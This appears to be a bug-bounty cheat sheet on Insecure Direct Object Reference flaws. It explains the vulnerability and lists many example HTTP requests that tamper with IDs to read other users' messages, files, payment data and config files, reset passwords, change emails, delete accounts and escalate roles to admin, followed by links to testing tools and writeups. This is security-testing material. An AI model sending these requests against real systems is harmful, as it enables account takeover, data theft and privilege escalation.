IDOR
IDOR or Insecure Direct Object Reference, is an access control vulnerability where an application relies on user-supplied input to fetch data without proper authorization checks. This means an attacker can manipulate request parameters, such as IDs in URLs or API calls, to access unauthorized information like personal details, private files, or even entire database records.
For example, if changing orderId=1234 to orderId=1235 in a request lets someone view another user’s order, that’s a classic IDOR flaw. Since these vulnerabilities can exist throughout an application, security testers often look for patterns in object references, even if they appear obfuscated or encoded.
How Does IDOR Work? A web application uses predictable object references (e.g., sequential user IDs, file numbers, or tokens). The app fails to validate whether the user is authorized to access a particular resource. An attacker manipulates request parameters to access unauthorized data.
Manual Exploitation Payloads
Access Another User’s Private Messages
Some applications do not validate user ownership of messages, allowing attackers to view others' conversations
GET /api/messages?user_id=9876GET /api/messages?recipient_id=8888GET /api/messages?thread_id=1234&user_id=9999GET /messages/view?msg_id=56789POST /messages/fetch?chat_id=7777&user_id=4321
Download Another User’s File
If file access control is weak, changing the filename can allow unauthorized downloads.
GET /api/download?file=user123_report.pdfGET /api/files/download?filename=invoice_456.pdfGET /user_data/12345/secret_document.docxGET /download?path=/home/user/private.pdfPOST /api/files?file_id=2222&access=public
Modify Another User’s Profile Settings
If user ID parameters are poorly validated, an attacker can modify another user’s settings.
POST /api/updateSettings?user=admin&dark_mode=truePOST /api/user/update?user_id=5432&[email protected]PUT /profile/settings?user_id=9999&privacy=publicPOST /settings/update?user=8888¬ifications=offPATCH /api/user/5678?bio=HackedByMe
Delete Another User’s Account
Lack of proper authorization checks can allow attackers to delete other users.
DELETE /api/removeUser?id=9999POST /api/deleteUser?user_id=1234GET /admin/delete_account?user_id=5678POST /account/remove?target_id=7777PUT /api/user/deactivate?uid=4321
Access Admin Logs
If endpoint security is weak, an attacker can directly request admin logs.
GET /logs/admin?logfile=server.logGET /api/logs?type=admin_accessPOST /debug/logs?user_id=0&admin=trueGET /internal/audit?log_id=20240305GET /server/logs/error.log
Change User Role to Admin
Some applications allow role manipulation by modifying the user role parameter.
POST /api/updateRole?user_id=1234&role=adminPUT /api/user/modifyRole?uid=8888&role=superuserPOST /users/update?user=7777&privilege=99PATCH /api/users/setRole?user=2222&role=ownerPUT /system/users?user_id=4444&access_level=superadmin
View Another User’s Order Details
Weak access control can expose sensitive order details.
GET /api/orders?order_id=5678POST /order/details?order=9999GET /user/purchase?uid=4321GET /invoice/view?inv_id=7777POST /api/orders/history?user=2222
Access Another User’s Payment Information
Changing the user ID in a billing API call might reveal payment details.
GET /api/billing?user_id=9999GET /user/payment/details?uid=8888POST /transactions/view?customer_id=7777GET /wallet/history?account=4321POST /api/cards?user=2222
Change Password for Another User
If password reset requests don’t verify ownership, attackers can change other users' passwords.
POST /api/resetPassword?user_id=5555&new_password=hacked123GET /password/reset?target=9999POST /account/password/change?user=7777&new_pass=pass123PUT /api/auth/updatePassword?uid=4321&new=hello123PATCH /users/modifyPassword?account=2222&password=newpass
Retrieve Private Images or Documents
Some applications expose file paths without proper authorization checks.
GET /api/userImages?img=private_doc_001.pdfGET /uploads/view?file=secret_picture.pngPOST /files/access?file_id=7777&user=4321GET /private/images/9999.pngGET /api/resources/view?doc_id=2222
Add Another User to a Private Group Without Permission
By manipulating group parameters, an attacker can add users without consent.
POST /api/group/addMember?group_id=7777&user_id=8888GET /group/invite?gid=9999&target=4321POST /team/addUser?team=5678&user=2222PUT /community/join?member=1111&group=4321PATCH /forum/addMember?uid=7777&group_id=6666
Gain Unauthorized API Access Using Wildcards
Using wildcard characters may bypass security checks and expose more data.
GET /api/users/*GET /data/all_records?*POST /api/logs?entry=*GET /search?q=*POST /system/list?all=*
Bypass User Verification by Replacing Email with User ID
Some applications authenticate users based on email but allow direct ID-based access.
POST /api/authenticate?user_id=4321GET /auth/[email protected]&uid=9999POST /session/create?user=7777&auth=trueGET /api/auth/check?username=adminPOST /login/override?user_id=2222
Change Another User’s Email Address
If email update requests don’t verify passwords, attackers can hijack accounts.
PUT /api/updateEmail?user_id=1234&[email protected]POST /account/modifyEmail?uid=8888&[email protected]PATCH /profile/edit?user=7777&[email protected]POST /users/changeEmail?target=4321&[email protected]GET /api/settings/email?user_id=2222&[email protected]
Disable Another User’s Account
Some applications allow account disabling through an easily modifiable request.
POST /api/disableAccount?user_id=7890PUT /users/deactivate?uid=8888GET /admin/account/ban?user=7777POST /system/user/disable?target=4321PATCH /account/suspend?user=2222
Retrieve Internal Configuration Files
Appending different extensions might expose system configurations.
GET /config/settings.jsonGET /system/config.xmlGET /server/env_vars?file=.envGET /admin/settings.iniGET /api/config/db_config.yaml
View All User Profiles by ID Enumeration
Sequentially modifying user IDs may allow enumeration of user profiles.
GET /api/users/profile?user_id=1001GET /user/info?uid=9999POST /directory/view?user=7777GET /api/members?account=4321POST /app/users?id=2222
Modify Another User’s Subscription Plan
Some applications allow direct plan upgrades or downgrades via parameter tampering.
POST /api/updatePlan?user_id=2222&plan=premiumPUT /subscription/change?uid=8888&plan=goldPATCH /billing/modifyPlan?account=7777&new=enterpriseGET /api/upgrade?target=4321&level=proPOST /plans/set?user=2222&subscription=lifetime
Access Hidden Admin Dashboard
Some applications have hidden admin panels accessible via direct URL manipulation.
GET /admin/dashboardGET /management/controlPanelPOST /superuser/homeGET /root/admin?access=1GET /secure/admin/home
Escalate Privileges by Overwriting an Existing Role
If role changes are not properly restricted, attackers can elevate their privileges.
PUT /api/user/role?user_id=6543&role=superadminPOST /roles/set?user=8888&privilege=99PATCH /admin/users?uid=7777&role=rootPOST /api/access/update?account=4321&clearance=highestGET /system/users?user_id=2222&access_level=superuser
Testing For IDOR - ( Automated Method )
- Finding Broken Access Controls
- PimpMyBurp #1 - PwnFox + Autorize: The perfect combo to find IDOR - Global Bug Bounty Platform
- Automating BURP to find IDORs
Writeups
- Full account takeover worth $1000 Think out of the box
- All About Getting First Bounty with IDOR
- IDOR that allowed me to takeover any users account
- All About IDOR Attacks
- Access developer tasks list of any of Facebook Application
- Everything You Need to Know About IDOR
- Finding more IDORs - Tips and Tricks
- KathanP19/HowToHunt
- Learn about Insecure Object Reference (IDOR) | BugBountyHunter.com
- WSTG - v4.2
- IDOR
- What I learnt from reading 220* IDOR bug reports